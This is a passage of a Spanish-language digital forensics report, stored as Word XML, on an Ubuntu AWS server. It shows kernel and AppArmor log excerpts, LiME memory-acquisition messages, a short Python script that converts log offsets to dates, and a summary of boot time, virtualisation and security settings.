    <w:p w14:paraId="0D05F440"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[433154323395.433] audit: type=1400 audit(1545394312.290:56): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/lib/NetworkManager/nm-dhcp-client.action" pid=12675 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3877EDD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lastRenderedPageBreak/>
        <w:t>[433154810248.433] audit: type=1400 audit(1545394312.290:57): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/lib/NetworkManager/nm-dhcp-helper" pid=12675 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEBA8C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[433155243731.433] audit: type=1400 audit(1545394312.290:58): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/lib/connman/scripts/dhclient-script" pid=12675 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB7583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[433167590815.433] audit: type=1400 audit(1545394312.302:59): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="/usr/bin/lxc-start" pid=12677 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C072D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[433240662059.433] audit: type=1400 audit(1545394312.374:60): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/bin/man" pid=12679 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5003D1F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[21462442803498.21462] kauditd_printk_skb: 13 callbacks suppressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9BD63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[21462442805151.21462] audit: type=1400 audit(1545415341.020:74): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/usr/sbin/mysqld" pid=773 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75C6C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[21463206148453.21463] audit: type=1400 audit(1545415341.784:75): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=867 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2756E4F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[21463221380545.21463] audit: type=1400 audit(1545415341.800:76): apparmor="DENIED" operation="capable" profile="/usr/sbin/mysqld" pid=867 comm="mysqld" capability=2  capname="dac_read_search"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A54B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[21463255863431.21463] audit: type=1400 audit(1545415341.836:77): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=879 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=111 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB17FF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[21756594961731.21756] audit: type=1400 audit(1545415635.164:78): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=2652 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068643F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[21833553902942.21833] audit: type=1400 audit(1545415712.122:79): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=3061 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA985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[21875757992232.21875] audit: type=1400 audit(1545415754.321:80): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=3542 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE46A7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[22018568104327.22018] audit: type=1400 audit(1545415897.129:81): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=3758 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED493D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[22018607698200.22018] audit: type=1400 audit(1545415897.169:82): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=3763 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=111 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C39A08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[22074531220184.22074] audit: type=1400 audit(1545415953.092:83): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4539 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D08F6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[22210765671468.22210] audit: type=1400 audit(1545416089.324:84): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4632 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1119F78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[22210807976537.22210] audit: type=1400 audit(1545416089.368:85): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4640 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=111 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3A983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[22273491157183.22273] audit: type=1400 audit(1545416152.047:86): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/sbin/mysqld" pid=4768 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF48F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[22273549967523.22273] audit: type=1400 audit(1545416152.107:87): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4786 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCEAEF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[22273604163691.22273] audit: type=1400 audit(1545416152.159:88): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4801 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401A993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[22277537601294.22277] audit: type=1400 audit(1545416156.095:89): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4860 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57748CE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lastRenderedPageBreak/>
        <w:t>[22280230105408.22280] audit: type=1400 audit(1545416158.786:90): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4912 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E3D0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[22282295921818.22282] audit: type=1400 audit(1545416160.850:91): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/sbin/mysqld" pid=4947 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D89125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[22282854213630.22282] audit: type=1400 audit(1545416161.410:92): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=5019 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E91355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[22282898519612.22282] audit: type=1400 audit(1545416161.454:93): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=5027 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=111 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B780F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[22419123420018.22419] audit: type=1400 audit(1545416297.675:94): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=5121 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAD55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[22419167903891.22419] audit: type=1400 audit(1545416297.719:95): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=5125 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=111 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5337A6D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[25524580731645.25524] audit: type=1400 audit(1545419403.049:96): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/snap/core/6130/usr/lib/snapd/snap-confine" pid=6200 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1907D14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[25524581172130.25524] audit: type=1400 audit(1545419403.049:97): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/snap/core/6130/usr/lib/snapd/snap-confine//mount-namespace-capture-helper" pid=6200 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF48ED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[25524661228460.25524] audit: type=1400 audit(1545419403.129:98): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.core.hook.configure" pid=6203 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5017FC0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[25524667927860.25524] audit: type=1400 audit(1545419403.137:99): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="snap-update-ns.core" pid=6205 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432DA94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[25525728627714.25525] audit: type=1400 audit(1545419404.197:100): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap-update-ns.amazon-ssm-agent" pid=6264 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C332B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[25525731681561.25525] audit: type=1400 audit(1545419404.201:101): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.amazon-ssm-agent.amazon-ssm-agent" pid=6265 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607CE22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[25525734393872.25525] audit: type=1400 audit(1545419404.201:102): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.amazon-ssm-agent.ssm-cli" pid=6266 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FDE0C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[25525776327926.25525] audit: type=1400 audit(1545419404.245:103): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="/snap/core/6130/usr/lib/snapd/snap-confine" pid=6271 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A59CA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[25525776541774.25525] audit: type=1400 audit(1545419404.245:104): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="/snap/core/6130/usr/lib/snapd/snap-confine//mount-namespace-capture-helper" pid=6271 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33782C8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[25525795866859.25525] audit: type=1400 audit(1545419404.265:105): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap-update-ns.core" pid=6273 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245214B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[66030429896299.66030] new mount options do not match the existing superblock, will be ignored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF23F4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[1108227154620838.1108227] lime: version magic '4.15.0-42-generic SMP mod_unload ' should be '4.15.0-1021-aws SMP mod_unload '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1772252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[1109556640120032.1109556] lime: loading out-of-tree module taints kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27210490" w14:textId="11079F49" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A2A95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[1109556640155159.1109556] lime: module verification failed: signature and/or required key missing - tainting kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB5BC58" w14:textId="3DB36B1D" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DCDB8F" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6046F238" w14:textId="73FE13F8" w:rsidR="006A2A95" w:rsidRDefault="006A2A95">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCCAF68" w14:textId="505FBA9E" w:rsidR="006A2A95" w:rsidRDefault="004C5DDC" w:rsidP="006A2A95">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_Ref155654459"/>
      <w:bookmarkStart w:id="190" w:name="_Toc155782537"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00182D42">
        <w:t>III</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006A2A95">
        <w:t>Resumen del comando linux_demsg.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
      <w:bookmarkEnd w:id="190"/>
    </w:p>
    <w:p w14:paraId="75510E85" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="1F7463B7" w14:textId="42D70DAD" w:rsidR="00520AAC" w:rsidRDefault="006A2A95" w:rsidP="00D52A79">
      <w:r w:rsidRPr="006A2A95">
        <w:t>Para los cálculos de tiempos se ha usado el siguiente script de Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4406E7" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="00D52A79"/>
    <w:p w14:paraId="32B31F07" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="00C9562B" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7624026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from datetime import datetime, timedelta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E65E4" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3217C88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 Initial timestamp in UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5575923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initial_timestamp = datetime(2018, 8, 28, 10, 23, 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A76AB96" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A1530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 Additional microseconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB6D4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additional_microseconds = 0.0 #insertar aquí el timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509C94BC" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2202DCD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 Convert microseconds to seconds for timedelta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E0120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additional_seconds = additional_microseconds / 1_000_000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49218205" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2585D8F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 Calculate new datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE1BC8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new_datetime = initial_timestamp + timedelta(seconds=additional_seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5A6E0D" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A2A95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>print("new_datetime: ",new_datetime.isoformat())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1360F8F2" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="00C9562B" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419E6F88" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="00D52A79"/>
    <w:p w14:paraId="6A953E23" w14:textId="71A9F2BD" w:rsidR="00520AAC" w:rsidRDefault="006A2A95" w:rsidP="00D52A79">
      <w:r w:rsidRPr="006A2A95">
        <w:t>Explicado el script anterior, un resumen de los datos de interés para este análisis forense de este servidor es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4562C3C5" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="65667478" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="00C9562B" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEA874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 Establecimiento del tiempo origen de tiempos donde el 28 de Agosto de 2018 a las 10:23:07 UTC el cual arranca el servidor. Se considera que el tiempo [0.0] es el origen de tiempos del sistema marcado en microsegundos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635587FC" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634EC7D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Linux version 4.15.0-1021-aws (buildd@lcy01-amd64-001) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #21-Ubuntu SMP Tue Aug 28 10:23:07 UTC 2018 (Ubuntu 4.15.0-1021.21-aws 4.15.18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6055F951" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4A93A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 Se descarta información relativo al arranque del servidor, la cual tiene marcada el tiempo [0.0], ya que sería el 1 de enero de 1979. Se mantiene la relevante la cual se explica a continuación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111072B3" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0CF380"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 El Servidor es una Máquina virtual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE6515C" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CC2AC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Hypervisor detected: Xen HVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77923E4D" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406D15A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 Memoria disponible y su distribución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E43694" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550EAB3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[0.0] Memory: 983488K/1048180K available (12300K kernel code, 2391K rwdata, 3908K rodata, 2372K init, 2376K bss, 64692K reserved, 0K cma-reserved)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB9348" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52DE085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 Seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF40ED6" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE9F7E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[228243285.0] evm: security.selinux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD8B37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[232011134.0] evm: security.SMACK64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A700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[236008501.0] evm: security.SMACK64EXEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7759214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[240007990.0] evm: security.SMACK64TRANSMUTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315F4F9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[244004736.0] evm: security.SMACK64MMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307CBB0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[248007490.0] evm: security.apparmor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C20DD34"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[252007875.0] evm: security.ima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D2FAE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[255626852.0] evm: security.capability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF0D9D8" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E21075" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9E1BF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 EL RCT no coincide con el timestamp!!!, puede ser una coordinación de tiempos. el 28 de agosto de 2018 a las 10:27:31 UTC..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A2B250" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349F5EA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[264281367.0] RTC time: 12:04:38, date: 12/21/18</w:t>
      </w:r>
    </w:p>
